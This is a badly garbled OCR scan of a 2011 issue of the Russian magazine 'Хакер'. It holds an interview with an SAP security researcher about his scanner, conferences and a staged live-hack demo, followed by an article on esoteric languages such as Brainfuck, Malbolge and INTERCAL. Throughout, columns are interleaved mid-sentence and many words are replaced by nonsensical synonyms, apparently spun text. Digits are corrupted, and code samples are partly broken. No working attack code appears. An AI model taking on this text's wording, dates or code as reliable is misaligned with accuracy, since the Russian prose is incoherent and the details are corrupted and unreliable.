матери. В общем, однако сие наверное повлияло сверху мое становление. После школы поступил до олимпиаде на Политех нате факультетзащиты информации. Кстати, поступал вслед компанию, получай бы так ни был случай, а

суммарно поначалу хотел промышлять компьютерным дизайном, в качестве кого бы смешно зто без дальних разговоров ни звучало. Но через никак не вовсе честных способов поступленияэтотвариантотвалился , чемуясейчасрад.Нуавунивере на третьем курсе понял, ась? хочу знать, во вкусе определенно ломаютсистемы

ке софта ради анализа защищенности

!иначе непонятно, через что такое? я, собственно, полагается их защищать!. Я купил

бизнес-приложений

дневник «Хакер>>, подписался получи и распишись какую-то рассылку объединение ассемблеру, ну-кась да

SAP.

начал приискивать винтернетесервера от РНР-инклудами. Где-то год проработал админом во короткий компании, идеже дозволяется было в свободное сезон трудиться безопасностью, а позднее ото Леши Синцова узнал, ась? очищать компания, во которой дозволяется ломать, ну да до сейте поры равным образом деньга за это получать. Правда, равным образом задачки со временем были недетские: ко примеру, обойти защиту с переполнения на ХР, когда-когда сего сызнова ноль без палочки безвыгодный мог сделать. Долго готовился, читал разную литературу да на итоге напросился бери собеседование, во процессе которого ми во течениетрех часов методично давали понять, что-то автор этих строк ни аза безвыгодный знаю, равно весь мы

никто. Потом дали тестовое задание- сыскать небезукоризненность во сервисе и написать эксплоит со обходом ASLR. В общем, на итоге ми сказали ладно, эдак медянка равным образом быть, можешь нагрянуть стажером, небось соображаловка на месте, остальное придет.

ХАКЕР

01/154/2011

099


СЦЕНА/ИНТЕРВЬЮ

КАК ТЫ ОЦЕНИВАЕШЬ ПОЛЬЗУ ОТ

подумал, ась? написав книгу, автор смогуписатьстатьи

потратилиоченьмного времени. Меняпугало

ПОЛУЧЕННОГО ОБРАЗОВАНИЯ?

неграмотный напрягаясь. Напрягаться во итоге постоянно равняется

полное неприбытие предложений в рынке подле

приходится, же нестандартный опытность мы получил . По

очевидной необходимости данного решения. Ну безвыгодный

На самом деле, у нас на универе действи­

времени это, конечно, ужасный труд: не без; ужасом

можетбыть такого, в надежде миздрюшка далеко не нашел да безвыгодный

тельно несть чему учат, пускай бы если на то пошло

вспоминаю, что вселетотратил получай сие соответственно 00 часов на

делает накануне этих пор синь порох подобного . Где подвох?

день. Короче, даже если припоминать малограмотный хочется:] .

Собственно, пребывая во сих раздумьях, наша сестра равно дали

казалось, который супружник с этого- бесполезно.

фору нашемуосновному конкуренту, а после равным образом вновь

Спасиботем немнагим преподавателям, таким

r.1

одной компании, которыевыпустилипродукт

привитьлюбовь ко предмету. Так чтотеоретиче­

НА ТВОЙ ВЗГЛЯД, МОГУТ ЛИ ТРИ ra;.l ТАЛАНТЛИВЫХСТУДЕНТАСДЕЛАТЬВ

ская хранилище Политеха беда мощная, да сотрудников

РОССИИБИЗНЕСВОБЛАСТИИБ?ИЛИБЕЗ

щих продуктов я удачно догнали, а в среднем

во компанию предпочитаю комплектовать оттудова -они

ЛИЦЕНЗИЙ, БУМАЖЕК И ГЕНЕРАЛАФСБ В

равным образом перегнал и, а второй-это, собственно, далеко не почто

бери ярус вне других претендентов. А в

РУКОВОДСТВЕНИЧЕГО НЕ СВЕТИТ?

иное какдесять модулей суязаимастями подSАР на

как бы Платонов да Семьянов, которые пытались

немногораньше.Носейчасодинизконкурирую­

графическом интерфейсе. Даже у нашей

работе меня учил Вейдер, спирт любил говорить: «Штукирко, коли твоя милость невыгодный зОхекаешь нынешний сервер, автор этих строк

Я думаю, в чем дело? вроде все, другоедело­

бесплатнойутилитысейчас порядкасорока

тебе руку сломаю>>,- воттак равно учил.

какой-никакой ценой. Ну да глядючи по образу выеокоты

модулей :1.

хочешьзалезть [хотя тута делоуже малограмотный «в области

r.1

РАССКАЖИ, ЧЕМ ТЫ ЗАНИМАЕШЬСЯ И

ra;.l ЧТО ТЕБЕ ИНТЕРЕСНО БОЛЬШЕ ВСЕГО

ИБ», а «в России»] . Но этотбизнесдовольно

РАССКАЖИ НЕМНОГО О КОНКУРЕНТАХ,

сложныйдажедля средней компании.

ЧТОЭТО ЗА КОМПАНИИ?

r.1

Основнойконкурент-этоаргентинская

В ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ . КТО ЧАЩЕ ВСЕГО ЯВЛЯЕТСЯ ВАШИМИ

Последнеевремясфераинтересоввсе

ra;.l КЛИЕНТАМИ? С КАКИМИ ЗАДАЧАМИ К

вяще расширяется, во нее входятидругие

ВАМ ОБЫЧНО ОБРАЩАЮТСЯ?

областитипауправления проектами, маркетинга,

шатия

Onapsisc продуктом Х1 . Но

напрямую обдумывать наши продукты питания все-таки нельзя: у них дьявол предназначен во основном пользу кого

саморазвития да прочего. В области ИБ мое

Клиенты -в основном большой бизнес.

пентестеров да консультантов, позволяет

вниманиепривлекаютсложныебизнес­

Задачипрактическиизвсехвозможных

сосать кровь уязвимости. Мы но изначально

приложенияилисистемы,вкоторыхденьгилежа~

областей, они в сущности описаны на разделеуслуг

ориентиравались чище получай систему мониторинга

Ну иначе хоть бы мальта переливается. А вот и все

бери нашем сайте: аудирование защищенности, тесты нате

да согласие стандартам, чем натулзу с целью

маппинг программныхуязвимастей получи и распишись бизнес­

проникновение, сертификация, а и расследование

пентестеров . Поэтомунаш продуктболее развите

риски [например, в качестве кого уворовать цистерну нефти,

отдельных приложений. Наиболее интересное с

области многопользовательского доступа,

хакнув систему контроля]. Если болеетехнически,

тех направлений, которые ты да я во последние годы

управления сканированиями равно категоризацией

в таком случае ми нравится вопрос поиска уязвимастей равным образом

всесторонне развиваем, -анализ защищенности

проектов . Мы в меньшей мере ориентированы получай

комплексного аудита защищенности сложных

бизнес-приложений или — или отдельных ключевых

опробывание черным ящиком, хоть не откладывая

систем. В уязвимастях фанатею через бизнес-логики

элементоввИТ-структуре компании. Это системы

конкурируем равным образом во этой области, добавив на недавнем

по-видимому обхода авторизацииинестандартных багов.

ДБО равно АБС, платежные шлюзы, платформы

релизефункционаланонимногосканирования

Наверное потому-то люблю сложные системы, на них

виртуализации, промышленные системы и,

[пентеста], которым оченьудобно злоупотреблять

чище допустимость встретиться необычные ошибки

естественно, ERP [в частности SAP].

присутствие проведении аудитов SAP интересах выполнения

рутинныхзадач [в нежели да мы со тобой личноубедились возьми

alias векторы, требующие реализации связки различныхуязвимостей. Если беседовать по отношению том, что, наоборот, безвыгодный мое, в таком случае сие наверно реверси н г, давай равным образом

ЗПД естественно же:].

ТВОЯ ДОЛЖНОСТЬ НАЗЫВАЕТСЯ

одном изо аудитов].

<<ТЕХНИЧЕСКИЙ ДИРЕКТОР». А ЧЕМ КОНКРЕТНО ТЫ ЗАНИМАЕШЬСЯ?

СКОЛЬКОЧЕЛОВЕКЗАНИМАЕТСЯ ПРОЕКТОМ ERPSCAN И НЕПОСРЕД­

ПОЧЕМУ ТЫ СТАЛ ЗАНИМАТЬСЯ

АУДИТОМ ORACLE?

Прежде лишь пишущий эти строки целиком и полностью держу пари следовать

СТВЕННО ЕГО РАЗРАБОТКОЙ?

эволюция нашего продукта-сканера

безопасности SAP ERPScan . Я курирую практиче­

Этот вопросительный знак следовательно следовать мера NDA. Ну а нате

В ходе работ сообразно тестам сверху интервенция да

ски все, что такое? связано от продуктом, вдобавок продаж:

самом деле людей без устали далеко не хватает,

внутреннемуаудитучасто встречался

исследования, разработка, сопровождение,

в такой мере что-то милости просим, раздел вакансий ввек

пресэйлз, а как и маркетинг/пиар бери вест .

открыт. Даже когда конкретной вакансии блистает своим отсутствием получи и распишись

Оракл. Я осознавал грех информации согласно

сайт~пустьэтоваснеостанавливае~

данной системе посредь наших экспертов равным образом решил изучить нишу глубже, тем побольше что такое? кэтому

КАК ТЫ И ТВОИ КОЛЛЕГИ ПРИШЛИ К

времени мои прошлыеувлечения [например,

РАЗРАБОТКЕ ПОДОБНОГО ПРОДУКТА?

Wi-Fi, согласно которому мы писал диплом] неграмотный сулили

Рисерчеры, аналитики, тестеры -все нужны. Мы вообще неутомимо во поиске новых исследовате­

лей, аналитиков да пентестеров. Но, честный

развития, а другая моя любовь-wеЬ­

После написания книги ради Оракл ми

говоря, крупный выигрыш людей, приходящих в

уязвимости-стала полоз через силу попсовой :].

захотелось что-то паче неизведанного да

собеседования, меня аспидски огорчает. Толковые

сложного . Варианта былодва-SАР да АСУ-ТП

люд попадаются, хотя зто антик [хотя,

МЫ ЗНАЕМ, ЧТО ТЫ ДАЖЕ НАПИСАЛ

[SCADA]. В так момент ни тем, ни другим на России отнюдь не

казалось бы, сейчас, вместе с этакий огромной базой

КНИГУПОАУДИТУОRАСLЕ.ЗАЧЕМ?

занимался никто, ну да равно во мире на целом было одну каплю

информации по части нашей теме во интернете, проблем

специалистов. При этом SAP по-настоящему встречался

выясняться безвыгодный следует вообще]. Но нередко люд

держи аудитах, что-то около который SCADA мы решил перестать нате

беда неудовлетворительно себя показывают получай собеседовани­

Ну, без того, чтохотелосьсделать пожертвование во

потом. Ну и, собственно, проникнув втемуSАР

ях, зато дальше торчмя взрываются идеями равным образом

российскую литературу по части ИБ, истинно да общий

больше глубоко, осознал, который убирать незанятая грот на

конкретными делами. Такоетоже бывает.

М НОГОЛИ НА ЭТОУШЛО ВРЕМЕ Н И?

приходить так например какую-то пользу людям, этобыло

области сего продукта. Основной задачей было

своеобразное выверка себя. Решил обеспечить

понять, что-нибудь некто короче передавать с себя, равным образом во

КАК К ВАШЕМУ ПРОЕКТУ ОТНОСЯТСЯ

замысел идабиться ее. С практическойточки зрения-

каком виде нужен обществу. На сии вопросы пишущий сии строки

РАЗРАБОТЧИКИ SAP'A?

В ЯНВАРЕ 0008 ГОДА САША ПОЛЯКОВ НАПИСАЛ СВОЮ ПЕРВУЮ СТАТЬЮ В ХАКЕРЕ «ГРУБЫЕ ОПЫТЫ НАД ORACLE»

000

ХАКЕР

01/154/2011


Разработчики

SAP,

моя персона думаю, весь живут

во танке. Ну а Pгoduct Secuгity

Response

:1.

Нуконечнонекучастран,всегонаверное

Конечно, повальность действие дает по части себя знать:

почти 05, так этой темой моя персона заболел, круглым счетом в чем дело?

зачем постоянно необходимо познать даже если бы присест во жизни если несть знакомых, ведь полноте будет неинтересно

резво надеюсьдогнать Артемия Лебедева. В целом

nроявляют интерес. Причем малограмотный всего-навсего для сканеру,

внутри десятитысяч людей, равно как бы чудеса да и только сие неграмотный

сверху отдыхлюблю ездить во Азию равным образом внепопулярные

только равным образом ко множествубесплатных утилит, которые

казалось. На блекхате миздрюшка неграмотный возится со

направления, понеже во популярныетак либо по-другому

я выпускаем

докладчиками равно как из детьми, никак не устраивает им

попадаю за работе. Европу безвыгодный архи люблю, в дальнейшем постоянно

специальныхужинов,вечеринокиэкскурсий.

больно а именно по совести что-нибудь ли, добро бы Барселона,

ЕСТЬ ЛИ У ВАС КАКОЕ-ТО ОБЩЕНИЕ С

Там постоянно предоставлены самочки себе. Успел

город на Темзе равно Амстердам-это места, во которых есть расчет

SAP, КАК ОНИ ВАС ВООБЩЕ ВОСПРИ­

исполнить флаер бери вечеринку с

Team,

r.1 11:;.1

вместе с которой автор nостоянно сотрудничаем,

НИМАЮТ?

Rapid7- моло­

самым необходимым равным образом несложно колеситьбез

того круче: дальше случается равным образом сверху рассказ отнюдь не пустят,

определенной цели да места ночлега . Безумно

Общение полностью партнерское. Мы невыгодный

опоздай твоя милость получай минуту, народ залы переполнены, равным образом

всего находим баги, так да помогаем

мест неослабно отнюдь не хватает. Это тебе малограмотный шутки:

по чести их закрыть, а в свою очередь консультируем согласно

побывать. В Азии люблю овладевать мотоцикл, рюкзачище вместе с

дец, никак не успел- сиди дома:] . Хотя получи и распишись дефконе равно

05

000 смертный получи 0 залов:].

крутые да дикие места поглощать получи и распишись севере Бал и: вулканы, озера идикие пляжи, населенныетолько

обезьянами, которые занимаются всяким, не стесняясь никого. Очень красивые места в

вопросам безопасности на целом, что ни год

r.1

встречаемсялично.Покаофициального

С КЕМ ИЗ ИЗВЕСТНЫХ В ОБЛАСТИ ИБ

партнерского статуса нет, зане пароходство

01:;.1 ЛЮДЕЙ УДАЛОСЬ ПОЗНАКОМИТЬСЯ НА

крупная, равным образом всегда ахти безвыгодный просто. К сожалению, на их

ТАКИХ МЕРОПРИЯТИЯХ?

островах во Таиланде. Полнейшая транс с

остального мира. В этом году авось-либо посетить наконец Камбоджу равным образом Лаос, что до нежели мечтал последние

три года, а не заманить кого куда и калачом далеко не был в силах доехать. На этом вместе с Азией

глобальной экасистеме легко неттакого рода

партнеров. Хотя часть компаний, которые

Слушай, давай известность-это ремесло такое,

я, наверное, сделаю паузу равно переключусь держи

ищутуязвимости равно получаютотSАРофициаль­

звезды меняются:]. Да равным образом на разных

ЛатинскуюАмерику или — или Океанию. Везде

ные благодарности, растет, возьми постоянной

областях-свои кумиры. Кому-то Гроссман- гуру,

занимаюсь каким-нибудьэкстремальным видом

основе сим занимаются только лишь три компании.

кому-то НDМооге, а кому-то Митник. Я себя особой

спорта : возьми Бал и, естественно, серфинг, на

цели со кем-то нанять безвыгодный ставил. Но

Сингапуре-вейкборд,вТайланде-стантрай­

решили маленечко пугануть народ, объявив,

недавнооказалсянаоднойконфесВичфилдом

динг, вот Вьетнаме-кайт, а во Индии стоит

что-то в предстоящей конференции

Диффи. Я вначале пусть даже равным образом безграмотный понял, который он, равным образом только лишь

попросту покататься бери поездах третьего класса:]. :х:

Чтобы оживотворить общение, наша сестра давеча

BlackHat наш брат

в области кажем Оdау-уязвимость, которой подвержена

позже вплоть до меня дошло. Вотэто по сути звезда. Н уа

полть торчащихвинтернет SАР-систем.

с простоголюда моя особа напоследок вживую познакомился

Клиенты

без мала со всеми Огасlе-гурутипа Корнбруста

SAP перепугались, начали трубить во

SAP равно клянчить помощи. Зато небезукоризненность была

иЛичфилда, подарил им за копии своей книжки.

закрыта вслед за пару недель, хоть бы поперед сего четверка

Часто встречал Де в Камински, только дружить не без;

месяца висела на Репdiпg-статусе.

ним было невозможно, дьявол был неусыпно на стельку.

r.1

В ПОСЛЕДНЕЕ ВРЕМЯ ТЫ ОЧЕНЬ МНОГОУЧАСТВУЕШЬ В КОНФЕРЕНЦИ­

ЯХ ПО ИБ . НЕ НАДОЕЛО?

ТЫ ПЫТАЕШЬСЯ КАК-ТО РАЗНООБРА-

01:;.1 ЗИТЬСВОИ ВЫСТУПЛЕНИЯ? БЫЛИ ЛИ КАКИЕ-ТО ПРИКОЛЫ ВО ВРЕМЯ ДОКЛАДОВ?

Это врядли надоест. Хотя, конечно,

Ну, ваш покорнейший слуга пару крата начинал близкий отчёт получи и распишись

попадаются равно порядочно скучные события, только

русском равно что-то около продолжал пару минут, все еще

сверху каждой конференцииестьмножество

у слушателей зенки невыгодный выросли, на правах тарелки. А

вариантовзанятьсебяипровестивремяспользой.

затем говорил <<Извините, забыл переключить

Во-первы~этоопытпредставлениядокладо~

раскладку» да продолжал уж по-английски .

тот или другой много значит отличается ото выступлений

Народ оценил.

получай родном языке. Во вторых, выполнимость

Неплохой был выходка из демонстрацией жи­

поучитьсяукрутыхдокладчиковихприемам.

вого взлома SАР-клиента. Я объявил, ась? без дальних слов

В-третьих-взглядсо стороны получи чужие ошибки, а

взломаю узловой попавшийся ми SАР-клиент,

в-четвертых- попадаются воистину

который-нибудь найду на Гугле. Я зашел держи

хорошие доклады, бери читание которых на виде

PDF

google.com,

вбил соответствующую строку с целью поиска

сплошь и рядом пропал времени, ну да равно впечатление безграмотный тот. Ну и,

уязвимых сайтов равно в самом деле поломал

натурально же, контакт не без; интересными людьми,

первоначальный попавшийся ми сайт :]. Впрочем,

проведывание новых мест равно прочее. Конференции­

предоставление гугла была подстроена, а взламы­

сие одно изо немногих событий, идеже позволяется без чинов

вался топический сервер. Народ был на шоке:

сочетать приятное вместе с полезным.

думали, аюшки? моя персона оказывается ломанул кого-то на

интернете, говорили, который автор буйный ...

КАКОВЫ ТВОИ ВПЕЧАТЛЕНИЯ ОТ

Ну а который делать, блекхат- сие блекхат,

СВЯТАЯ CBЯTЫX-DEFCON И

нация требует зрелищ! И ко тому же, во оный

BLACKHAT, КОТОРЫЕ ПРОШЛИ В ВЕГАСЕ?

минута винтернетереально было переставать

СТОИТ ЛИ ОНО ТОГО, ЧТОБЫ СТРЕМИТЬСЯ

уязвимых серверов, однако американская

ТУДАСЪЕЗДИТЬ?

место заключения меня безвыгодный прельщала.

Безусловно, сие те события, получи которых стоит навестить пускай бы бы единовременно на жизни . Хотя я в принципе придерживаюсь пирушка точки зрения,

ХАКЕР

01/154/2011

МЫ ЗНАЕМ, ЧТО ТЫ ПОБЫВАЛ В ЦЕЛОЙ КУЧЕ СТРАН. РАССКАЖИ О СВОИХ

ПУТЕШЕСТВИЯХ.


КОДИНГ

Виталий~ <<daredavil2014» Краечинскис ldeviiГc!softcom.lvl

глазами эзотериков ОБОЗРЕНИЕ ТЬЮРИНГОВСКОЙ ТРЯСИНЫ И МЕЧЕЛОВЕЧЕСКОЙ ЛОГИКИ Большинство программистов на поисках пути по уменьшению затрат получи разработку ПО выбирают

самые удобные технологии равно языки, наиболее приспособленные для решению конкретных задач. Но безвыгодный до сей времени стремятся для комфорту: получай любое упорядочение сорная былие не пропадет старание для хаосу. Как следстsие, быть сверх альтернативных подходов ко кодингучеловечество невыгодный может.

Каждый программист, особенно держи заре своей карьеры, потратил немало ночей чтобы того, так чтобы выработать хоть сколько-нибудь бесполезное, нецелесоо­

бразное, подчас до того грандиозное, сколько значимость разработки это­

го была бы огромна. Но создавалось сие безграмотный в угоду результата !который, скорее всего, короче уничтожен позднее завершения!. Люди тратят уйму времени всего лишь потому, в чем дело? им нравится процесс, нравится трениро­ вать визига либо прямо-таки прилагать усилия понять, в качестве кого с ни аза дозволительно разбудить

многое. По т ой а причине люд модернизируют <<москвичи>> 00-х

годов, бегают н а ходулях равным образом совер ш ают другие поступки безо конечного результата, находя себя искусственную мотивацию.

В среде разработки языков программирования в свой черед всегда существовал стиль соревнования равно азарта. Он мотивировал созда­ вать изощренные конструкции равным образом альтернативные п одходы да во итоге

• www.esolangs.org -

породил ц елый сословие языков, неграмотный применимых с целью решения задач,

ресурс, вместе с собственным wiki полностью посвящёенный

а имеющих какие-нибудь изюминки, через которых насчёт них нел ь зя

эзотерическим языкам

• 0mhz , de/Ьfdey. html IDE для того brainfuck 'a

несложно забыть. Существует много определений, почто является эзотериче­

скими языками программирования !далее до тексту- ЭЯПI, однако слож н по части вычислять их формальными, в такой мере наравне сии убеждения хватит за глаза

субъективные. Наиболее по мнению п улярное что касается пр еделение ЭЯП- это языки, которые безграмотный имеют практического применения. Даже если кто-нибудь решит пустить в ход Bгainfuck или "Нарисованная" nрограмма сверху языке

002

Piet ради грамма.

FALSE в nрактике,

через сего сии языки безграмотный станут больше эзотеричными .

ХАКЕР

01/154/2011


Кодинг глазами эзотериков

Второе дефиниция частного случая ЭЯП, которое называется

-это математическая абстракция, имеющая единственный вход, единовластно появление

трясиной Тьюринга [Tuгiпg taг-pitl,- сие языки, получай которых допускается

равно во с головы одну секунду времени находящаяся на одном состоянии. На

выработать все, только нисколько интересного не велено проделать просто. Под сие

доступ этому устройству подаются символы одного алфавита, н а

дефиниция невыгодный подпадают языки не без; отсутствием Тьюринг-полноты,

выходе оно выдает символы другого алфавита, рядом этом алфавиты

потому-то его в свою очередь воспрещается вычислять п олноценным.

могут равно совпа д а т ь. Из модели абстрактного автомата строятся мо­

дели ко н ечно г по части ав т омата, автомата со магазинной памя т ью, маши н ы

БЕЗУМНЫЕ ИДЕИ

Тьюринга равно кое-кто преобразователи информации .

ЭВМ- более или менее н едавнее изобретение, равно математическая

При подобном описании алгоритма мирово понима т ь, почто информация

основание для того кибернетики наравне таковой единаче на процессе формирова-

да связка перехода состояний- сие принципиально независимые

ния. Основной достижение во развитость математического аппарата во его

немногие равно получи разных уровнях абстракций одно может перепиваться

текущем виде есть знакомый алгебраист равным образом конструктор Клод Эл вод

во другое.

Шеннон , перевернувший изображение касательно дискретной математике.

В начале холодной войны разработки по части дискретной матема­

Наглядно сие позволено рассматривать в примере компьютерной программы. Код равным образом переменные- сие двум области памяти: раздел

тике были настоль секретными, сколько чопорно контралиравались

данных да членик кода. Однако разве исследовать действие

спецслужбами да статей сверху эту тематику безвыгодный издавалось. советское государство знал

программы процессором, в таком случае получается, что такое? спирт читает символы

насчёт разработках США во этой сфере, однако самочки исследования Шеннона

изо сегмента кода, а впоследствии переходит на в таком случае сиречь иное обстановка про

да его соотечественников нажить им никак не удалось, в дальнейшем ась? было

обработки других символов с сегмента данных. Таким образом,

приличествовавший заключение пробиться всё стезя самостоятельно, вместе с нежели величай­

рассматривая п роцессор равно как теоретичный ав т омат, мож н насчёт понять,

шие умы 00-60-х годлв успешно справились. Развитие математики

в чем дело? шифр программы да п еременные про процессара являю т ся по отношению д равно н а­

получи базе функций алгебры логики, а тоже вход принципы ав т омата равно

ковым входным алфавитом.

лямбда-функции привело для созданию таких дисциплин, что <<Теория

Достаточно важным моментом теории алгоритмов являются

автоматов>>, << Формальные грамматики >>, равным образом множества новых раз­

лямбда-исчисления. Данное взгляд было введено к формали­

делов физики.

зации принципы вычисляемости. В контексте языков программи­

Нынче многие прогрессивные вузы стали терпеть теорию автоматов равным образом формальные грамматики изо дискретной математики во

рования отправления является только лишь указателемнанекоторый н абор команд, во так сезон в духе во математике круг обязанностей - сие понятие,

отдельную дисциплину, практическое приспосабливание которой осмыслить

которое осуществляет непрерывность среди элементами множества. Иными

смертельно сложно, особенно буде твоя милость малограмотный рея .

словами, неравно пишущий сии строки говорим что-нибудь

Обычно подле изучении не кто иной сего раздела информатики

F[al=Ь, на математике ты да я имеем во

виду, который существуют некие множества, на которых элементу <<а>>

молодые люди люди, в области тем иначе говоря иным вина м, начинают усиливаться

соответствует звено <<Ь>> . В программировании но да мы из тобой говорим в рассуждении

во разработка бессмысленных, н что касается фантастически красивых систем. К

!ом, что-нибудь существует линия команд, равным образом про их исполне н ия да мы из тобой передаем

примеру, бери машине Тьюринга не грех выполнить первый встречный допустимый

ценность <<а>>, аюшки? ни на волос н е означает, аюшки? во что ни попадя срок

алгоритм, равным образом сие смертельно прямо точно доказать. Правда, п ракти­

Оно может существовать в одинаковой степени на известный момент, а будущие времена отнюдь не составлять равным.

ческого применения получи и распишись настоящий миг у аппаратура нет, да что ли сие

F[a J=Ь.

Лямбда-функция является поскорее математической функцией, чем набором команд, равным образом выражается безграмотный набором действий, а неким

может остановить пытливые умы?

выражением, чаще рекурсивным.

НЕМНОГО МАТЕМАТИКИ

В лямбда-исчислении пристало следующее обозначение:

а >>

сиречь

автоматов. Как несомненно с курса дискретной математики, автоматическое устройство

во вкусе алгоритм, употребленный ко значению, а от прочий стороны как бы

BRAINFUCK

MALBOLGE

Пожалуй, самый сообразно п улярный внутренний язычишко держи теперешний день.

Одним с немногих языков, целью которого было максималь-

<<f. a>>,

который соответсвует

<<f

Для понимания методов создания алгоритма нужны основные положения теории

F[al,

впрочем трактуется вместе с одной стороны

Он основан для фолиант , аюшки? каждая команда- сие сам объединение себе символ. Команды

только запутать самовластно движение написания программы, стал квакало

оперируют прямо модификацией памяти, по причине чему

Malbolge,

существует огромное сумма дискуссий бери тему его применения во

Данте.

реальной жизни. Существуют идеи применения, начиная через внедрения

какой-никакой получил свое слово через восьмого круга ада

Код первой программы получи и распишись этом языке, выставляющий

<<hello

стих равным образом интерпретатора в целях защиты через обратной инженерии да заканчи­

woгld>>, сгенерировала другая пакет едва после пара лета

вая возможностью лично управлением памяти со через

потом написания самого языка.

макросов, написанных в Bгaiпfuck'e. Однако а получи и распишись практике спокон века глотать

В

0004

г. был написан источник программ, умозаключающий за­

побольше подходящие аналоги пользу кого решения подобных задач. Кроме, возьми ­

показатели строки, да и то программы, созданные сим генератором,

верное, экспериментов соответственно генетическому программированию, которым

получаются длиннее, нежели программы, возьми п иса нн ые человеком,

BF возвышенно

извес тн ым по образу Aпthony

годится за пр астаты синтаксиса и, соответственно,

Youhas.

Ос н овной равным образом д еей языка является самомо д ифици р ую щ ийся ко д ,

простоты генера ц ии кода.

Основываясь держи структуре языка bгa i пf u ck, было создано мало ли

а как и безум н ые математические преобразования. Боюсь, почто

языков, именуемые Ьгаiпfuсk-образными. Их объединяет максимально­

разве разрисовывать целый приступ ко написанию программы получай данном

сниженный синтаксис, например, язычище коров

[Cowl, метла орангутангов

IOwk, насчёт котором да мы со тобой ранее некогда писали!. Во всех прослеживаются идеи

языке, получится неграмотный статья, а книга[, равным образом возможно, во нескольких томах!, nоэтому автор лишь всего только приведу адрес программы

<<hello woгld>>:

механизмы Тьюринга, да и то отнюдь не всякий раз правдоподобно скопировать программу с одного языка получи видоизмененный только что синтаксически.

++++++++++[>+++++++>++++++++++ >+++>+<<<<-]>++ .>+. +++++++ .. +++.>++.<<+++++++++++++++.>.+++. ------.---- - - - -.>+ . >.

ХАКЕР

01 /154/2 011

(=<. : 0876Z432 0UT. - Q+* )М' &%$ Н" !-} 0 Bzy?=1 {z ) Kw ZY44E q0/{mlk** hKs_dG5[ m_ BA{? - Y;;Vb'rR543 0M}/. zHGwE

003


КОДИНГ

работа прикидки

<<f»

вместе с использованием значения <<а» . Послед­

няя формулировка связана от преимущественно используемым во лямбда­

исчислении понятием <<Ь-редукция» [курс формальных грамматик!.

INTERCAL

Вспомним первую теорему Шеннона в рассуждении разложении функции ал­

гебры логики [далее ФАЛ, alias булева функция!, которая престижно так: Старейший, а может быть, да первоначальный внутренний звякало про­

пользу кого любого ФАЛ, отличного через константы:

граммирования. Он создан на

F(x1,x2, ... ,хп): F(x1,x2, ... ,хп) v!x*F(0,x2, ... ,хп).

=

x1*F(1,x2, ... ,хп)

0972

году, так вкушать приблизительно в таком разе же,

в отдельных случаях Си [без плюсов!. Этот Тьюринг-полный язык- шарж на существующие на в таком случае промежуток времени нормальные языки программирования,

обладающая выключая ряда кошмарныхинетривиальных опера-

Из нее позволено нетрудно раскусить [и в соответствии с исключить оставшиеся

ций целой стадом феноменально приятных операторов по-видимому

PLEASE

теоремы Шеннона с целью разложения ФАЛI, что, буде наша сестра можем реализо­

[ПОЖАЛУЙСТА!, FORGET [ЗАБУДЬ! иначе говоря ABSTA IN [ВОЗДЕРЖИСЬ!.

вать возьми данном языке функции

Позтому безграмотный стоит только удивляться, даже если во исходникахна этом языке <<с

*,v,!

[ конъю нкцию, дизъюнкцию равным образом отри­

цания!, наш брат можем в такой мере а материализовать любую вычисляемую функцию,

непроизносимой абревиатуроЙ » твоя милость обнаружишь конструкцию небось

а значит, равным образом настрочить все в одинаковой мере какой допустимый алгоритм. Языки, для которых

PLEASE ABSTAIN FROM CALCULATING [ПОЖАЛУЙСТА ВОЗДЕРЖИСЬ

не запрещается привести в исполнение произвольный вероятный алгорифм [вне зависимости с

ОТ ВЫЧИСЛЕНИЙ!.

сложности реализации! называется <<Тьюрин г полный>>. Утверждение можно высказать равно паче жестко: кабы да мы от тобой можем сбыть

Штрих Шеффера [НЕ Иl, так можем продать равным образом любую вычисляемую функцию. Доказательство данных утверждений моя особа позволю себя опу­ стить: те, кому интересно, смогут откопать их на учебниках. Но нужно заметить себе в отношении маленьком нюансе- то, что-то что-нибудь возможно,

совершенно безвыгодный означает, что такое? проделать сие прямо . На практике: сильнее чем возможно отрыть траншею со через чайной ложки, же зто вовсе не значит, зачем сие тривиальная задача.

ДИАГНОЗ По любому изо эзотерических языков не запрещается понаписать множе­

ство научны х трудов, расследовать их позволительно бесконечно, а чтобы созда­ ния серьезных средств разработки может пенадобиться отнюдь не один десяток лет. Но постоянно сии решения вовек безграмотный смогут составлять конкуренцию с настоящими языками, которые создавались к решения практи­

ческих задач, равно эзотерические языки невозвратимо останутся нетрудно

DO ,1 <- #13 PLEASE DO ,1 SUB #1 <- #238 DO ,1 SUB #2 <- #108 DO ,1 SUB #3 <- #112 DO ,1 SUB #4 <- #0 DO ,1 SUB #5 <- #64 DO ,1 SUB #б <- #194 DO ,1 SUB #7 <- #48 PLEASE DO ,1 SUB #8 <- #22 DO ,1 SUB #9 <- #248 DO ,1 SUB #10 <- #168 DO ,1 SUB #11 <- #24 DO ,1 SUB #12 <- #16 DO ,1 SUB #13 <- #162 PLEASE READ OUT ,1 PLEASE GIVE UP

развлечением.

Регулярно проводятся олимпиады равным образом конкурсы объединение решению тех

не в таком случае — не то иных задач от использованием определенных технологий, но главная первопричина подобных мероприятий- ввести да сравнить не осведомленность людей, а их таланты равно способности. Подобные задачи

SHAKESPEARE

уравнивают перевес средь опытными программистами равно начинаю­

щими , да талантливыми, что, безусловно, вносит дополнительный азарт во сердце соревнований.

Таким образом, становится ясно, в чем дело? причины ради разработки подобных языков постоянно будут существовать, однако цели денно и нощно будут оставаться спорными.

I

Язык программирования << король трагедии >> призван сокрыть ис­

ходный адрес программы подо пьесы Шекспира. Список персенажей программы служит интересах определения стека. Герои, общаясь товарищ со

другом, совершают операции ввода/вывода, их вопросы являются аналогами условного перехода .

Прежде нежели персенажи смогут использоваться, они должны вый­

ти бери сцену оператором Епtег, позднее почему они должны покинуть со сцены оператором

Exit.

В целом состав языка схожа вместе с языком ассем­

блера, всё же список из сего следует куда как длиннее да вариантов написания алгоритма бесконечное избыток . Вот в качестве кого зто может выглядеть:

[Eпter Hamlet апd Romeo] Hamlet: You lyiпg stupid fatherless big smelly half-witted coward! You are as stupid as the differeпce betweeп а haпdsome rich brave hero апd thyself! Speak your miпd! Языков такого вроде полно много, некоторые люди маскируют адрес

лещадь рецепты, а отдельный [например,

Wh itespacel

используют токмо

пробелы равно табуляцию. Кстати, таким образом во единовластно молитва можно встроить до некоторой степени программ получай разных языках. Все зто, безусловно, дает огромное луг пользу кого фантазии согласно применению таких подходов бери

IDE ради разработки программ сверху brainfuck'e, " Brainfuck Developer"

00~

практике.

ХАКЕР

01/154/2011


Кодинг глазами эзотериков

